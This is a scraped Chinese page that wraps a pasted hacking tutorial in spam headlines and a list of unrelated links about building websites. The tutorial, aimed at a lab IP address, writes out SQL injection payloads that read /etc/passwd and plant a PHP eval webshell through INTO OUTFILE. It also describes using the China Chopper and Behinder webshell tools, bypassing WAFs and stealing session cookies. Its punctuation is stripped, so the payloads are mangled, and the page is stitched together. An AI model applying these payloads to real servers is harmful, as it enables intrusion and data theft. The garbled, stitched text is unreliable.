当前位置: 首页 > news >正文

网站开发域名注册功能做网站怎样盈利

网站开发域名注册功能,做网站怎样盈利,ip段访问网站代码,司法政务网站群建设找到了漏洞后#xff0c;并且上传了木马之后才能使用的两款工具 中国菜刀和冰蝎 想办法获取别人的cookie#xff0c;cookie中有session-id 一、中国菜刀 1、必须提前已经完成木马植入然后才能使用 2、木马必须是POST请求#xff0c;参数自定义#xff0c;在菜刀里给出…找到了漏洞后并且上传了木马之后才能使用的两款工具 中国菜刀和冰蝎 想办法获取别人的cookiecookie中有session-id 一、中国菜刀 1、必须提前已经完成木马植入然后才能使用 2、木马必须是POST请求参数自定义在菜刀里给出正确的参数名。 是属于辅助工具并且菜刀的传输过程是明文传输的目前已经被WAF进行防护了。 先看是否存在注入点有下图所示则表示存在注入点》可以进行接下来的操作 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,4,5,6 有文件则说明可以读任意路径的文件 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,(select load_file(/etc/passwd)),5,6 写入一句话的木马进行探测如果嗅探成功后在进行大马的上传 http://192.168.74.133/security/read.php?id1 and 12 union select 1,2,3,?php eval($_POST[a]) ; ?,5,6 into outfile /opt/lampp/htdocs/security/temp/mm.php 在post中写入PHP的代码aphpinfo();可以获取你想要的配置信息也可以用system函数来输入命令 接下来就可以连接菜刀使用菜刀来连接木马然后就可以查看到服务器里面的东西了 使用wireshark进行抓包用来分析流量 假设菜刀被WAF挡了 二、Behinder冰蝎 冰蝎是加密传输防火墙很难分析出流量特征比较容易绕开防火墙。 所以需要先上传一个冰蝎自己的带加密功能的shell脚本这个上传shell的过程通常有以下几种方式 1直接在命令行运行命令按行用echo 写入 asystem(echo $postfile_get_contents(php://input); /opt/lampp/htdocs/security/temp/muma.php);
http://www.w-s-a.com/news/820373/

相关文章:

  • 武冈 网站建设做网站能收回吗
  • 网站做前端把网站扒下来以后怎么做
  • 网站模板素材下载手机做任务佣金的网站
  • 机关网站建设考核测评总结做网站sqlserver排序
  • 凉山州建设厅官方网站html5下载教程
  • 内网网站建设方面政策id97网站怎么做的
  • 福州企业建站系统七米网站建设
  • 长春seo建站北京做机床的公司网站
  • 网站维护具体做啥如何开发wap网站
  • 公司网站设计费计入什么科目潍坊公司网站制作
  • 拖拽式网站开发模具钢东莞网站建设
  • 彩票娱乐网站建设模块化网站开发
  • 孝感网站设计用自己的名字设计头像
  • 高明网站建设哪家好深圳vi设计公司全力设计
  • 工程技术cpu游戏优化加速软件
  • 一起做网店网站入驻收费wordpress 自定义评论样式
  • 深圳高端网站建设公司排名app软件开发sh365
  • 泰州网站整站优化惠州做网站多少钱
  • 做博客网站的php代码一建论坛建工教育网
  • 邢台网站制作费用单页营销网站后台
  • 红色网站建设的比较好的高校用vs2010做购物网站
  • 网站域名备案号查询网页设计实验报告总结模板
  • 什么软件 做短视频网站好大型论坛网站建设
  • 视频网站用什么cms网络运营与维护主要做什么
  • 设计网站主页要多少钱赣州制作网站百度
  • 什么叫高端网站定制网站收录大幅度下降
  • 汝城县网站建设公司aspx网站实例
  • 专业微网站营销diywap手机微网站内容管理系统
  • 盗版做的最好的网站温州logo设计公司
  • 网站建设 中山南充微网站建设